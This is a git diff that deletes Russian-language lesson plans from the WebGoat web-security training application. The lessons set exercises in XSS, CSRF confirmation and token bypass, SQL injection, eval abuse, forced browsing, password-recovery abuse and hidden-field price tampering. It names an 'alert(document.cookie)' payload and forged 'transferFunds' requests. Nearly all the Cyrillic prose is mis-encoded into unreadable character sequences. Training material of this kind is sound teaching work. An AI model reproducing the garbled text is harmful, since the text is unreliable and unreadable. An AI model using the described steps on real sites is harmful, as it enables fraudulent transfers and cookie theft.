- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð³ÑƒÑ‚ обрабатывать множеÑтво HTTP-запроÑов одновременно. -ЧаÑто разработчики иÑпользуют конÑтрукции не приÑпоÑобленные к многопоточной работе, и -Ñто Ñоздаёт возможноÑть иÑÐ¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¾ÑˆÐ¸Ð±Ð¾Ðº ÑвÑзанных Ñ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ñ‹Ð¼Ð¸ обращениÑми. -Ðапример когда одна и та же Ñтраница открываетÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ разными пользователÑми и один их них видит -на ней данные другого. -Под приÑпоÑобленноÑтью к многопоточной работе подразумеваетÑÑ ÑпоÑобноÑть полей клаÑÑов и объектов -вÑегда находитьÑÑ Ð² верном ÑоÑтоÑнии при выполнении множеÑтва одних и тех же операций вызываемых -разными потоками. ПоÑкольку вÑе потоки иÑпользуют одно и то же рабочее проÑтранÑтво вызываемых методов, и в данном -проÑтранÑтве хранÑÑ‚ÑÑ Ð´Ð°Ð½Ð½Ñ‹Ðµ вÑех ÑвойÑтв отдельно взÑтых клаÑÑов, то множеÑтвенные одновременные попытки -обращений к ним могут привеÑти к неожиданным результатам.
- -

ОÑновные цели:

-Ваша цель - проÑкÑплуатировать уÑзвимоÑть Ñтого типа Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб получить возможноÑть покупать товары по заниженной цене. -
-
-
diff --git a/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html b/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html
deleted file mode 100644
index 1784101e1..000000000
--- a/src/main/webapp/lesson_plans/ru/CrossSiteScripting.html
+++ /dev/null
@@ -1,21 +0,0 @@
-
-

Ðазвание урока: Как проводить атаки межÑайтового Ñкриптинга (XSS)

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда -их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к -БД. Это важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то -внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте -таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре. -
-XSS также может возникнуть когда Ð²Ð²ÐµÐ´Ñ‘Ð½Ð½Ð°Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ñразу же, -без вÑÑчеÑких проверок, помещаетÑÑ Ð² HTTP-запроÑ, но не ÑохранÑетÑÑ Ð²Ð½ÑƒÑ‚Ñ€Ð¸ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ -(отражаемые XSS). Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе -вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом. - -

ОÑновные цели и задачи:

-Ðа данном уроке вы научитеÑÑŒ иÑпользовать хранимые и отражаемые XSS-уÑзвимоÑти. -Ð’ конце вам придётÑÑ Ð²Ð½ÐµÑти Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð² код Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð´Ð»Ñ ÑƒÑÑ‚Ñ€Ð°Ð½ÐµÐ½Ð¸Ñ Ð´Ð°Ð½Ð½Ñ‹Ñ… уÑзвимоÑтей. -
-
diff --git a/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html b/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html
deleted file mode 100644
index 3223bc3cb..000000000
--- a/src/main/webapp/lesson_plans/ru/CsrfPromptByPass.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-

Ðазвание урока:CSRF, обход мезанизмов подтверждений


-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы научитеÑÑŒ проводить CSRF-Ð½Ð°Ð¿Ð°Ð´ÐµÐ½Ð¸Ñ Ð² обход механизмов Ð¿Ð¾Ð´Ñ‚Ð²ÐµÑ€Ð¶Ð´ÐµÐ½Ð¸Ñ Ð¾Ð¿ÐµÑ€Ð°Ñ†Ð¸Ð¹. -
-
-

-Как работает данный клаÑÑ Ð°Ñ‚Ð°Ðº: -

-CSRF ÑвлÑетÑÑ Ñ‚Ð°ÐºÐ¸Ð¼ видом атак, при проведении которых браузер жертвы, без её ведома, отправлÑет -на целевой Ñайт запроÑÑ‹ нужные злоумышленнику. Иногда, при проведении важных операций, Ñервер может -запроÑить у Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¸Ñ… подтверждение. Этот ход может показатьÑÑ Ñ€ÐµÑˆÐµÐ½Ð¸ÐµÐ¼ проблем ÑвÑзанных Ñ CSRF, -но только не в ÑлучаÑÑ… когда подтверждение реализовано ÑредÑтвами JavaScript. Ðа данном уроке вы научитеÑÑŒ -обходить такие варианты подтверждений, как одиночных, так и многочиÑленных. Решением будет ÑвлÑтьÑÑ Ñ‚Ð° же поÑылка -поддельных запроÑов, но уже не одного, а неÑкольких. -

- - -
-

Цели и задачи:

- -Как и в прошлом уроке, вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° Ñлектронного пиÑьма в новоÑтную группу. ПиÑьмо, при проÑмотре, -должно вызывать отправку неÑкольких поддельных запроÑов: первый на оÑущеÑтвление денежного перевода, второй на -его подтверждение. Сначала URL, по которому будет произведено обращение, должен Ñодержать параметр "transferFunds", -равный "4000", затем его же, но Ñо значением "CONFIRM". ПоÑле того как Ñообщение отобразитÑÑ Ð½Ð° Ñкране, браузер любого -кто его увидит Ñам Ñделает вÑÑ‘ что нужно. Ð’ конце работы обновите текущую Ñтраницу. ЕÑли задание выполнено верно, то в -главном меню, на против Ñтого урока, поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°. - - diff --git a/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html b/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html deleted file mode 100644 index f2e0de169..000000000 --- a/src/main/webapp/lesson_plans/ru/CsrfTokenByPass.html +++ /dev/null @@ -1,41 +0,0 @@ -
-

Ðазвание урока:Обход CSRF-защиты оÑнованной на токенах


-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть CSRF-Ð½Ð°Ð¿Ð°Ð´ÐµÐ½Ð¸Ñ Ð½Ð° Ñайты, иÑпользующие токены в качеÑтве защиты -от CSRF-атак. -
-
-

-Как работают Ñти атаки: -

-

-CSRF-атаки заÑтавлÑÑŽÑ‚ браузер жертвы оÑущеÑтвлÑть необходимые злоумышленнику запроÑÑ‹ -к целевому Ñерверу в невидимом режиме. Это позволÑет атакующему вызывать выполнение различных операций -от лица атакованного Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ñ ÐµÐ³Ð¾ правами и привилегиÑми.

- -

ÐÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð·Ð°Ð¿Ñ€Ð¾Ñов принимаемых от поÑетителей, оÑÐ½Ð¾Ð²Ð°Ð½Ð½Ð°Ñ Ð½Ð° уникальных токенах, предотвращает -возможноÑть CSRF-нападений. При иÑпользовании данной техники, при отправке важного запроÑа, Ñерверу -передаётÑÑ ÑƒÐ½Ð¸ÐºÐ°Ð»ÑŒÐ½Ñ‹Ð¹ Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента токен, наличие которого подтверждает его легитимноÑть. -Проект OWASP CSRFGuard как раз иÑпользует такой подход, позволÑÑ Ð·Ð°Ñ‰Ð¸Ñ‚Ð¸Ñ‚ÑŒ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‚ CSRF-нападений. -

- -

-Тем не менее, данный вид защиты можно обойти. Ð”Ð»Ñ Ñтого доÑтаточно обнаружить на атакуемом Ñайте XSS-уÑзвимоÑть. -Её наличие поможет отправлÑть запроÑÑ‹ от имени жертвы, ведь ÑиÑтемы безопаÑноÑти вÑех браузеров, -оÑнованных на политике одного иÑточника, не запрещают обращатьÑÑ Ðº текущему домену. -

- -
-

ОÑновные цели и задачи:

- -Как и в прошлом уроке, вашей целью ÑвлÑетÑÑ Ð¾Ñ‚Ð¿Ñ€Ð°Ð²ÐºÐ° пиÑьма в новоÑтную группу Ð´Ð»Ñ Ð²Ñ‹Ð·Ð¾Ð²Ð° нелегитимного -перевода денег. Ð”Ð»Ñ ÐµÑ‘ доÑÑ‚Ð¸Ð¶ÐµÐ½Ð¸Ñ Ð²Ð°Ð¼ необходимо узнать дейÑтвующий токен. Он находитÑÑ Ð² коде Ñтраницы на -которой раÑположена форма перевода денег. Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб увидеть форму, необходимо к текущему URL -допиÑать параметр "transferFunds=main". Загрузите Ñту Ñтраницу, Ñчитайте оттуда значение токена и оÑущеÑтвите перевод. -Ð’ конце работы обновите текущую Ñтраницу. ЕÑли задание выполнено верно, то в главном меню, на против Ñтого урока, -поÑвитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð°Ñ Ð¾Ñ‚Ð¼ÐµÑ‚ÐºÐ°. - - - diff --git a/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html b/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html deleted file mode 100644 index 913efa53b..000000000 --- a/src/main/webapp/lesson_plans/ru/DBCrossSiteScripting.html +++ /dev/null @@ -1,21 +0,0 @@ -
-

Ðазвание урока: Как проводить атаки межÑайтового Ñкриптинга (XSS)

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда -их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к -БД. Это важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то -внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте -таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре. -
-XSS также может возникнуть когда Ð²Ð²ÐµÐ´Ñ‘Ð½Ð½Ð°Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ñразу же, -без вÑÑчеÑких проверок, помещаетÑÑ Ð² HTTP-запроÑ, но не ÑохранÑетÑÑ Ð²Ð½ÑƒÑ‚Ñ€Ð¸ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ -(отражаемые XSS). Ð’ таких ÑлучаÑÑ… нападающий может Ñформировать URL, Ñодержащий в Ñебе -вредоноÑный код и передать его жертве(ам) через Ñторонний веб-Ñайт, почту или любым другим ÑпоÑобом. - -

ОÑновные цели:

-Ð’ данном упражнении вы научитеÑÑŒ оÑущеÑтвлÑть хранимые XSS-атаки. -Ð’ конце урока вам необходимо будет внеÑти Ð¸Ð·Ð¼ÐµÐ½ÐµÐ½Ð¸Ñ Ð² код базы данных Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾, чтоб предотвратить подобые нападениÑ. -
-
diff --git a/src/main/webapp/lesson_plans/ru/DBSQLInjection.html b/src/main/webapp/lesson_plans/ru/DBSQLInjection.html
deleted file mode 100644
index 879a1b92e..000000000
--- a/src/main/webapp/lesson_plans/ru/DBSQLInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-

Lesson Plan Title: How to Perform SQL Injection

-
-

Concept / Topic To Teach:

- -It is always a good practice to scrub all inputs, especially those -inputs that will later be used as parameters to OS commands, scripts, -and database queries. Users should not be able to alter the intent of -commands that are executed on the server, in many cases as a privileged user. - -

General Goal(s):

-For this exercise, you will perform a SQL Injection attack. -You will also implement code changes in the database to defeat -these attacks. -
-
diff --git a/src/main/webapp/lesson_plans/ru/DOMInjection.html b/src/main/webapp/lesson_plans/ru/DOMInjection.html
deleted file mode 100644
index 8b4a87564..000000000
--- a/src/main/webapp/lesson_plans/ru/DOMInjection.html
+++ /dev/null
@@ -1,23 +0,0 @@
-
-

Ðазвание урока: Выполнение атаки клаÑÑа 'DOM-инъекциÑ'.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Выполнение атаки клаÑÑа 'DOM-инъекциÑ'. -
-
-

-Как работают атаки данного вида: -

-Ðекое приложение иÑпользует технологию AJAX Ð´Ð»Ñ Ð¼Ð°Ð½Ð¸Ð¿ÑƒÐ»Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ DOM Ñтраницы и его Ð¾Ð±Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ -по ÑредÑтвам JavaScript, DHTML и функции eval().
-Ð’ данном Ñлучае атакующий может каким-либо образом попытатьÑÑ Ð¿Ñ€ÐµÑ…Ð²Ð°Ñ‚Ð¸Ñ‚ÑŒ ответ Ñервера, и помеÑтить -в него набор вредоноÑных JavaScript-команд. -
-

ОÑновные цели и задачи:

- -* Ваша жертва - Ñто ÑиÑтема Ñ‚Ñ€ÐµÐ±ÑƒÑŽÑ‰Ð°Ñ Ð¾Ñ‚ клиентов ключ активации Ð´Ð»Ñ ÐµÑ‘ иÑпользованиÑ.
-* Ваша задача ÑоÑтоит в том, чтоб каким-либо образом разблокировать кнопку активации.
-* Уделите немного времени проÑмотру HTML-кода Ñтраницы и вы поймёте как работает веÑÑŒ механизм активации.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/DOMXSS.html b/src/main/webapp/lesson_plans/ru/DOMXSS.html
deleted file mode 100644
index e17c5d182..000000000
--- a/src/main/webapp/lesson_plans/ru/DOMXSS.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-

Ðазвание урока: МежÑайтовый Ñкриптинг оÑнованный на DOM (DOM XSS)

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -ÐžÐ±ÑŠÐµÐºÑ‚Ð½Ð°Ñ Ð¼Ð¾Ð´ÐµÐ»ÑŒ документа (DOM), Ñ Ñ‚Ð¾Ñ‡ÐºÐ¸ Ð·Ñ€ÐµÐ½Ð¸Ñ Ð±ÐµÐ·Ð¾Ð¿Ð°Ð½Ð¾Ñти, Ñоздаёт Ñобой одну интереÑную проблему. -Она позволÑет Ñодержимому веб-Ñтраниц динамичеÑки менÑтьÑÑ, что Ñамо по Ñебе ÑвлÑетÑÑ Ñ…Ð¾Ñ€Ð¾ÑˆÐµÐ¹ возможноÑтью -не только Ð´Ð»Ñ Ð²ÐµÐ±-маÑтеров, но и Ð´Ð»Ñ Ð·Ð»Ð¾ÑƒÐ¼Ñ‹ÑˆÐ»ÐµÐ½Ð½Ð¸ÐºÐ¾Ð². С её помощью нападающие могут помещать в код Ñтраниц -вредоноÑные вÑтавки (XSS), еÑли в процеÑÑе модификации их Ñодержимого на Ñтороне клиента не проиÑходит -доÑтаточной проверки данных вводимых пользователем. - - -

ОÑновные цели и задачи:

-Ð’ данном упражнении вам необходимо Ñ Ð¸Ñпользованием Ñтой уÑзвимоÑти помеÑтить вредоноÑный код -в объектную модель документа. Рв Ñамом конце вы иÑправите ошибку приводÑщую к её поÑвлению. diff --git a/src/main/webapp/lesson_plans/ru/DOS_Login.html b/src/main/webapp/lesson_plans/ru/DOS_Login.html deleted file mode 100644 index 460cd4100..000000000 --- a/src/main/webapp/lesson_plans/ru/DOS_Login.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Ðазвание урока: Отказ в обÑлуживании при неÑкольких одновременных попытках авторизации

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Ðтаки клаÑÑа "Отказ в обÑлуживании" ÑвлÑÑŽÑ‚ÑÑ Ð³Ð»Ð°Ð²Ð½Ð¾Ð¹ проблемой веб-приложений. Ситуации, при которых конечный пользователь -долгое Ð²Ñ€ÐµÐ¼Ñ Ð½Ðµ может получить доÑтуп к важному приложению или ÑервиÑу, могут принеÑти большие убытки. -

ОÑновные цели и задачи:

-Данный Ñайт позволÑет неÑкольким пользователÑм авторизироватьÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾. Ð’ то же Ð²Ñ€ÐµÐ¼Ñ -веб-приложение может уÑтанавливать Ñ Ð‘Ð” только 2 ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ð·Ð° раз. Ð’Ñ‹ должны получить -ÑпиÑок ÑущеÑтвующих пользователей и попытатьÑÑ Ð¾Ð´Ð½Ð¾Ð²Ñ€ÐµÐ¼ÐµÐ½Ð½Ð¾ произвеÑти вход от 3 логинов. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/DangerousEval.html b/src/main/webapp/lesson_plans/ru/DangerousEval.html deleted file mode 100644 index b3ee6b20a..000000000 --- a/src/main/webapp/lesson_plans/ru/DangerousEval.html +++ /dev/null @@ -1,16 +0,0 @@ -
-

Ðазвание урока: ОпаÑное иÑпользование eval()

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой ÑвлÑетÑÑ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ° на Ñтороне Ñервера вÑех принимаемых данных. -Ð’ ÑлучаÑÑ… когда непроверенные пользовательÑкие данные напрÑмую отражаютÑÑ Ð² HTTP-ответе имеетÑÑ -риÑк поÑÐ²Ð»ÐµÐ½Ð¸Ñ XSS-уÑзвимоÑтей. Ð’ текущем приложении не проходÑщие проверку пользовательÑкие данные помещаютÑÑ -в Ñтроку передаваемую функции eval(). Ð’ подобных ÑитуациÑÑ… (они называютÑÑ Ð¾Ñ‚Ñ€Ð°Ð¶Ñ‘Ð½Ð½Ñ‹Ð¼Ð¸ XSS-уÑзвимоÑÑ‚Ñми) -злоумышленник может ÑоÑтавить URL Ñодержащий Ñпециальные вредоноÑные вÑтавки, и опубликовать его -на Ñтороннем веб-Ñайте, отправить по почте или любым другим ÑпоÑобом донеÑти его до жертвы. - -

ОÑновные цели и задачи:

-Ваша цель - добитьÑÑ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð¿Ñ€Ð¾Ð¸Ð·Ð²Ð¾Ð»ÑŒÐ½Ð¾Ð³Ð¾ JavaScript-кода в данном приложении иÑÐ¿Ð¾Ð»ÑŒÐ·ÑƒÑ -уже имеющийÑÑ Ð² Ñтранице вызов eval(). Ð”Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб уÑпешно завершить урок вы дложны вызвать выполнение Ñтроки -'alert(document.cookie)'. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/Encoding.html b/src/main/webapp/lesson_plans/ru/Encoding.html deleted file mode 100644 index 2d642a45b..000000000 --- a/src/main/webapp/lesson_plans/ru/Encoding.html +++ /dev/null @@ -1,10 +0,0 @@ -
-

Ðазвание урока: ИÑпользование оÑновной кодировки

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -По множеÑтву причин Ñодержимое веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ хранитьÑÑ Ð² неÑкольких разных кодировках. - -

ОÑновные цели и задачи:

-Данный урок предназначаетÑÑ Ð´Ð»Ñ Ñ‚ÐµÑ…, кто знаком Ñ Ð¿Ð¾Ð½Ñтием кодировок и понимает -чем они отличаютÑÑ Ð´Ñ€ÑƒÐ³ от друга. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html b/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html deleted file mode 100644 index ff90da904..000000000 --- a/src/main/webapp/lesson_plans/ru/FailOpenAuthentication.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: ИÑпользование уÑзвимоÑтей ложной аутентификации

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- - Ðа данном уроке вы ознакомитеÑÑŒ Ñ Ð¾Ñновами Ð²Ð¾Ð·Ð½Ð¸ÐºÐ½Ð¾Ð²ÐµÐ½Ð¸Ñ ÑƒÑловий, приводÑщих к - ложной аутентификации пользователей. Ðапример, Ð»Ð¾Ð¶Ð½Ð°Ñ Ð°ÑƒÑ‚ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ñ Ð¼Ð¾Ð¶ÐµÑ‚ проиÑходить в тех ÑлучаÑÑ…, - когда Ð²Ð¾Ð·Ð½Ð¸ÐºÐ°ÑŽÑ‰Ð°Ñ Ð² процеÑÑе работы Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾ÑˆÐ¸Ð±ÐºÐ° (например неперехваченное иÑключение) - не позволÑет программе точно определить верноÑть вводимых пользователем данных.
- -

ОÑновные цели и задачи:

-Вы должны обойти механизм проверки аутентификации. \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html b/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html deleted file mode 100644 index 51d165243..000000000 --- a/src/main/webapp/lesson_plans/ru/ForcedBrowsing.html +++ /dev/null @@ -1,22 +0,0 @@ -
-

Ðазвание урока: Обращение к Ñкрытым реÑурÑам.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Как производить обращение к Ñкрытым реÑурÑам -
-
-

-Как работают такие атаки: -

-Эта техника иÑпользуетÑÑ Ñ…Ð°ÐºÐµÑ€Ð°Ð¼Ð¸ Ð´Ð»Ñ Ð¾Ð±Ñ€Ð°Ñ‰ÐµÐ½Ð¸Ñ Ðº тем реÑурÑам, ÑÑылок на которые -на Ñайте нет, но доÑтуп к которым никак не ограничен. -Одним из примеров такой техники ÑвлÑетÑÑ Ð·Ð°Ñ‚Ð¸Ñ€Ð°Ð½Ð¸Ðµ чаÑти URL Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб проÑмотреть Ñодержимое -незащищённой директории. -
-

ОÑновные цели и задачи:

- -* Вашей целью ÑвлÑетÑÑ ÑƒÐ³Ð°Ð´Ñ‹Ð²Ð°Ð½Ð¸Ðµ URL интерфейÑа конфигурации.
-* СÑылка на него видна только управлÑющему перÑоналу.
-* Приложение не проверÑет наличие ÑоответÑтвующих привилегий при доÑтупе к нему - diff --git a/src/main/webapp/lesson_plans/ru/ForgotPassword.html b/src/main/webapp/lesson_plans/ru/ForgotPassword.html deleted file mode 100644 index 824374b48..000000000 --- a/src/main/webapp/lesson_plans/ru/ForgotPassword.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: Как можно иÑпользовать Ñтраницу воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð¿Ð°Ñ€Ð¾Ð»Ñ

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¾Ñ‡ÐµÐ½ÑŒ чаÑто предоÑтавлÑÑŽÑ‚ Ñвоим пользователÑм возможноÑть воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð·Ð°Ð±Ñ‹Ñ‚Ð¾Ð³Ð¾ паролÑ. -К Ñожалению, во многих из них данный механизм реализован не безопаÑно. ИнформациÑ, Ñ‚Ñ€ÐµÐ±ÑƒÐµÐ¼Ð°Ñ Ð´Ð»Ñ Ð¸Ð´ÐµÐ½Ñ‚Ð¸Ñ„Ð¸ÐºÐ°Ñ†Ð¸Ð¸ -пользователÑ, как правило, очень проÑта. -

ОÑновные цели:

-Пользователи могут воÑÑтановить их пароль еÑли у них получитÑÑ Ð¾Ñ‚Ð²ÐµÑ‚Ð¸Ñ‚ÑŒ на Ñекретный вопроÑ. Ðа Ñтранице -воÑÑÑ‚Ð°Ð½Ð¾Ð²Ð»ÐµÐ½Ð¸Ñ Ð½ÐµÑ‚ никаких мезанизмов ÑвÑзанных Ñ Ð±Ð»Ð¾ÐºÐ¸Ñ€Ð¾Ð²ÐºÐ¾Ð¹ аккаунтов. Ваше Ð¸Ð¼Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ - 'webgoat', -любимый цвет - краÑный (red). Цель урока - воÑÑтановить пароль к аккаунту другого пользователÑ. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html deleted file mode 100644 index e30a55e33..000000000 --- a/src/main/webapp/lesson_plans/ru/HiddenFieldTampering.html +++ /dev/null @@ -1,17 +0,0 @@ -
-

Ðазвание урока: ИÑпользование Ñкрытых полей форм

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Разработчики иÑпользуют Ñкрытые Ð¿Ð¾Ð»Ñ Ñ„Ð¾Ñ€Ð¼ Ð´Ð»Ñ Ñ…Ñ€Ð°Ð½ÐµÐ½Ð¸Ñ Ð½Ð° загруженной клиентом Ñтранице -информации о ценах, авторизации, отÑÐ»ÐµÐ¶Ð¸Ð²Ð°Ð½Ð¸Ñ Ð¿ÐµÑ€ÐµÑ…Ð¾Ð´Ð¾Ð² по Ñайту и многом другом. -Очень чаÑто программиÑты пренебрегают проверкой данных получаемых из них. -Ðа Ñтом уроке вы научитеÑÑŒ находить hidden-Ð¿Ð¾Ð»Ñ Ð¸ изменÑть их Ñодержимое Ð´Ð»Ñ Ñ‚Ð¾Ð³Ð¾ чтоб -уÑтанавливать товарам нужную вам цену. -
- -

ОÑновные цели и задачи:

-Пользователь должен Ð¼Ð°Ð½Ð¸Ð¿ÑƒÐ»Ð¸Ñ€ÑƒÑ Ð·Ð½Ð°Ñ‡ÐµÐ½Ð¸Ñми Ñкрытых полей приобреÑти товар по ненаÑтоÑщей цене. - -Попробуйте заказать HDTV намного дешевле чем он Ñтоит на Ñамом деле. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/HowToWork.html b/src/main/webapp/lesson_plans/ru/HowToWork.html deleted file mode 100644 index f9f206c52..000000000 --- a/src/main/webapp/lesson_plans/ru/HowToWork.html +++ /dev/null @@ -1,55 +0,0 @@ - -

Как работать Ñ WebGoat

-

-Добро пожаловать в краткую инÑтрукцию по работе Ñ WebGoat.
-ЗдеÑÑŒ вы научитель иÑпользовать Ñам WebGoat, а также инÑтрументы, необходимые Ð´Ð»Ñ Ð½ÐµÐºÐ¾Ñ‚Ð¾Ñ€Ñ‹Ñ… уроков.

-

-

Ð˜Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ñ Ð¾ Ñреде работы WebGoat

-

-WebGoat работает под управлением Apache Tomcat. По умолчанию он наÑтроен на работу на хоÑте localhost, -однако в Ñлучае необходимоÑти Ð¸Ð¼Ñ Ñ…Ð¾Ñта может быть легко изменено. -Кроме того, по умолчанию WebGoat наÑтроен на работу лишь Ñ Ð¾Ð´Ð½Ð¸Ð¼ пользователем. Дополнительные учётные запиÑи -вы можете добавить в файле tomcat-users.xml. -ЕÑли вы хотите иÑпользовать WebGoat в лаборатории или клаÑÑе вам обÑзательно нужно изменить его базовую конфигурацию. -Ð”Ð»Ñ Ñтого пройдите в раздел "Введение" и прочтите главу "ÐаÑтройка Tomcat" -

- -

Ð˜Ð½Ñ‚ÐµÑ€Ñ„ÐµÐ¹Ñ WebGoat

-

-

-1. ЗдеÑÑŒ раÑполагаютÑÑ ÐºÐ°Ñ‚ÐµÐ³Ð¾Ñ€Ð¸Ð¸ уроков WebGoat. Кликните по любой категории и вы увидите какие уроки в неё входÑÑ‚.
-2. При клике здеÑÑŒ находÑÑ‚ÑÑ Ð¿Ð¾Ð´Ñказки которые помогут вам проходить уроки.
-3. При клике здеÑÑŒ отобразÑÑ‚ÑÑ Ð¿Ð°Ñ€Ð°Ð¼ÐµÑ‚Ñ€Ñ‹ текущего HTTP-запроÑа
